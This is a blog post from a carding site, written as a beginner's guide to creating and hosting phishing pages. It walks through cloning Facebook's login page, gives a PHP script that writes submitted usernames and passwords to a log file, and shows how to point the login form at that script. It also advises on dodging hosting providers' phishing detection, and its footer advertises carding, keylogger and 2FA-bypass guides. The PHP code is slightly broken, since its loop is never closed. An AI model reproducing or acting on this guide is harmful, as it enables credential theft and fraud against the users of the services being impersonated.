HOW TO CREATE AND HOST PHISHING OR SPAM PAGES IN 2022? (BEGINNERS FRIENDLY)

Dear hustlers, lately we are getting a lot of emails asking us a whole bunch of questions involving wide range of categories, while we do everything we can to accommodate you we find it nearly impossible to please everyone! 

Having said that, today we have decided to arm you with a knowledge to create your own beginners friendly phishing/scam pages in 2022.

We have come across many questions about creating phishing pages.

Those who have done their own research into this topic will notice that the principles behind each guide are somewhat similar, most of the hosting solutions provided in other guides do not work anymore due to an increase in the crackdown of phishing pages by the hosting companies, hate it or love it…. It is what it is!

In this guide, we will go through every step necessary to create and host a phishing page of your choice and it will be beginner friendly for whose who have never hosted a phishing/scam page will be able to understand and create one of their own.

Before you jump onto #step 1 make sure you have code editor and the simplest one that we use is notepad++ you can download it for FREE by following this link https://notepad-plus-plus.org/

So now that you have downloaded the code editor, lets get down to business, shall we?

#1. DOWNLOAD THE HTML INDEX

To start off, you need to obtain the HTML index of the page you are about to start off with.

There are various methods of doing this, there are even templates online for popular sites but they all cost a bit of $ and those of you who are broke will hit us up complaining why our guide includes something that cost upfront cost, while its not always possible to make money by investing nothing up front but we have a good few FREE options to bypass this particular one.

So first of all we are going to use the most basic way in order to be as  beginner friendly as possible.

So we are going to be using Facebook throughout this tutorial, so before you ask “can I use Gmail, MS360, YouTube, Chase Bank, Bank of America, Amazon, BestBuy, Ebay or PayPal,” the answer is YES! You can use ANY page as long as you can open that page on your computer you can use that page for phishing/spamming.

#2. THE SOURCE CODE OF THE PAGE

Now depending on your browser, there may be different methods. Normally it is done by right clicking the site and clicking “Inspect” or “Inspect Element.” Then you click on “(index).”

We have done that on our browser and a windows should come out similar to this one below:

#3. SAVING THE SOURCE CODE

Select the source that you see by pressing “Ctrl+A”, and copy-paste everything you see in the box, open your notepad++ that you downloaded earlier on to paste it all in there.

Use Notepad++ on windows, and a simple text editing program for those who you are not using windows. (Don’t use other programs).

After the code is pasted onto your notepad++, click “Save As” or whatever option that allows you to save that document. On Notepad it should look like this:

You will be saving this file onto your “Desktop” so its easier to discover and work through.

In the “File Name” name the document “index.html”, obviously without the quotation marks.

Change “Save as type” to the following:

“Hyper Text Markup Language (*html;*.htm;*.shtml;*.shtm;*.xhtml;*.xht;*.hta).”

Congratulations! You have finished the first step of the tutorial!

So now you can go to the desktop and open the “index.html” that you just saved.

Side Note:  If the page looks bad that simply means that the site has all sorts of files that you will need to display it properly but do not worry we’ve got you covered.

Go to “HTTRACK” page its a free program to download. it will solve all your problem and give you a frontend website displaying perfect in a folder all read to go! 

Website: https://www.httrack.com/

Download Page: https://www.httrack.com/page/2/en/index.html

HERE IS HOW TO CLONE ANY WEBSITE USING HTTRACK IN 2021

Assuming you’ve got the site part sorted now its time to get a little bit technical, don’t worry you’ve got cashoutempire.com on your side to walk you through every step along the way! 

#4. PHP FILE FOR PASSWORD HARVESTING

This PHP file that you will create next will serve as a tool to harvests the users password. Again there are several ways you can create this PHP file if you have some programming knowledge, but if you don’t worry, just copy our example PHP below in your notepad++.

<?php 
header (‘Location: facebook.com’); 
$handle = fopen(“log.txt”, “a”); 
foreach($_POST as $variable => $value) { 
fwrite($handle, $variable); 
fwrite($handle, “=”); 
fwrite($handle, $value); 
fwrite($handle, “\r\n”); 

fwrite($handle, “\r\n\n\n\n”); 
fclose($handle); 
exit; 
?> 

Obviously from the 2nd line you will change the “Location URL” to match the site URL you are phishing/spamming.

File name should be “post.php”

Save as type should be the one below:

“PHP Hypertext Preprocessor file (*.php;*.php3;*.php4;*.php5;*.phps;*.phpt;*.phtml)”

#5. HTML INCORPORATION WITH PHP PASSWORD FILE

Now, its time to modify the HTML file to incorporate your PHP file, to receive passwords that the users enter, now this is a little bit complex but sure enough you are well able to understand and do this task if you have a little faith and belief in yourself!

So let’s see how the website deals when the user submits a username-password. For Facebook, all you need to do is to Ctrl-F and type “action=” in the field.Now, you need to replace everything in the underlined portion with “post.php”, keep the quotation marks. (just one set please).Obviously, this method will be different for other websites. A good method to find it is by using Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the above method.Side Note: You will need to change this later when you actually host the website.

#6. PHP FILE FOR STORING PASSWORDS

Now here is the juicy part, making your phishing/spamming website online so other people can browse it.

You can use any decent hosting services to host and store passwords. For this tutorial, we will be using HostGator.

We will assume that you have already created a website with your hosting service.

For HostGator, you simply click on “File manager” and click “Upload Files”.

You need to just upload it to the main folder of your root folder.

Then you will upload your “PHP Files” and “Change Permission”.

Now you need to change the permission to “777”, which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one. Note down your web address!

#7. HOSTING THE PHISHING/SPAMMING PAGE

For this step, you will need to find your own hosting provider that you will use, otherwise you will get banned.

There is a reason why we don’t use the HostGator as our hosting provider for our actual pages, and that is because most hosting providers will employ auto scanning to detect phishing pages that they then ban after a review. We have experimented with over 50+ hosting services in the past before finding the right one you can do your own research on black-hat chat forums or simply contact our support and we will be able to recommend you one. When we were experimenting with hosting providers most of them banned us  within 1 hour of uploading the index file.

Let’s move forward by configuring the post.php Forum Now, before you host the website, remember the post.php/login form thing we configured above?

You need to find the login form thing again in your index.html and replace the “post.php” with “https://yourwebsiteforyourpostphpupload/post.php”, assuming that you uploaded to the root folder. Remember to add “https://” in front of the site (get the FREE lets script SSL certificate). In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to Facebook.com, if it does then you have pasted the correct site. However; if it doesn’t, then double check if you have uploaded your file to the correct directory.

Hosting the Actual Page Navigate to htmlpasta.com. You will see something similar to this:

Then, you need to copy the index.html file for your phishing site and paste it in there.

Now, click on the reCAPTCHA and click paste, you will get a link for your website.

CONGRATULATIONS! 

You have finished hosting your first phishing/spamming site!

Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to facebook.com.

Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file as all login details should be stored there.

 

Good Luck, see you on the other side!

 

CREDITS: 

READYMADE PHISHING/SPAM KITS/PAGES: 

 

BONUS ARTICLES: 

A GUIDE TO INSTALL A KEYLOGGER + DOWNLOAD 2021

HERE IS HOW TO CLONE ANY WEBSITE USING HTTRACK IN 2021

HOW NOT TO GET BLOCKED WHEN CREATING A FAKE FACEBOOK ACCOUNT 2021?

HOW TO CONFIGURE SOCKS5 ON IOS/ANDROID IN 2021

WHAT’S A BURNER SIM/PHONE AND WHY YOU MUST NEED ONE IN 2021?

LATEST ARGOS METHOD AND WORKING BIN 2021

HOW TO BUY BTC (BITCOIN) ON COINBASE WITH CC 2021

HOW TO FIND THE RIGHT TRUSTABLE IP FOR YOUR MACHINE 2021

2021 BEST VPNS FOR CARDING IN 2021 AND HERE’S WHY!

LATEST NON VBV BINS 2021

TOP 10 SITES TO CARD GIFTCARDS IN 2021

CASHOUTEMPIRE GUIDE TO KEEP YOUR ONLINE ANONYMITY IN CHECK!

A GUIDE TO BYPASSING BY AVOIDING 2FA ON YAHOO IN 2022

 

Comments are closed.

error: Alert: CashoutEmpire contents are protected!